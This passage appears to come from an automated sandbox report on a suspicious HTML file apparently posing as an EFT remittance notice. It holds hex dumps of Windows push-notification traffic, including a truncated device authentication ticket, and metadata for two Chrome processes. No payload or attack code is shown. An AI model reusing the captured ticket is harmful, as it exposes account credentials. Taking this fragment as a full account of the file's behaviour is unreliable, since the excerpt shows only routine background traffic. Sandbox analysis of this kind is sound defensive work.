                                    2025-02-19 19:41:32 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 51 72 73 77 4d 51 74 65 6b 53 32 30 36 31 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 32 39 62 37 63 33 66 65 61 36 31 66 35 37 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: 4QrswMQtekS20617.1Context: 1929b7c3fea61f57
                                    2025-02-19 19:41:32 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:41:32 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 34 51 72 73 77 4d 51 74 65 6b 53 32 30 36 31 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 32 39 62 37 63 33 66 65 61 36 31 66 35 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 4QrswMQtekS20617.2Context: 1929b7c3fea61f57<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/om
                                    2025-02-19 19:41:32 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 51 72 73 77 4d 51 74 65 6b 53 32 30 36 31 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 32 39 62 37 63 33 66 65 61 36 31 66 35 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4QrswMQtekS20617.3Context: 1929b7c3fea61f57<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:41:33 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:41:33 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6b 35 52 39 59 4a 46 43 69 6b 36 42 32 78 34 33 36 63 67 44 73 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: k5R9YJFCik6B2x436cgDsA.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22192.168.2.65003340.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:42:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 4e 4b 4f 76 76 47 50 77 55 32 36 53 5a 4d 44 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 31 37 34 32 38 35 36 38 32 38 64 31 30 65 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: YNKOvvGPwU26SZMD.1Context: 441742856828d10e
                                    2025-02-19 19:42:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:42:05 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 59 4e 4b 4f 76 76 47 50 77 55 32 36 53 5a 4d 44 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 31 37 34 32 38 35 36 38 32 38 64 31 30 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: YNKOvvGPwU26SZMD.2Context: 441742856828d10e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/om
                                    2025-02-19 19:42:05 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 4e 4b 4f 76 76 47 50 77 55 32 36 53 5a 4d 44 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 31 37 34 32 38 35 36 38 32 38 64 31 30 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: YNKOvvGPwU26SZMD.3Context: 441742856828d10e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:42:05 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:42:05 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 54 6f 31 43 6c 34 38 38 30 6d 76 44 78 78 36 62 44 42 31 6e 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: xTo1Cl4880mvDxx6bDB1nQ.0Payload parsing failed.


                                    Click to jump to process

                                    Click to jump to process

                                    Click to jump to process

                                    Target ID:1
                                    Start time:14:39:56
                                    Start date:19/02/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Rtotino)CQDM.html"
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:3
                                    Start time:14:40:00
                                    Start date:19/02/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,2419350445155316135,3379476555480300038,262144 /prefetch:8
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    No disassembly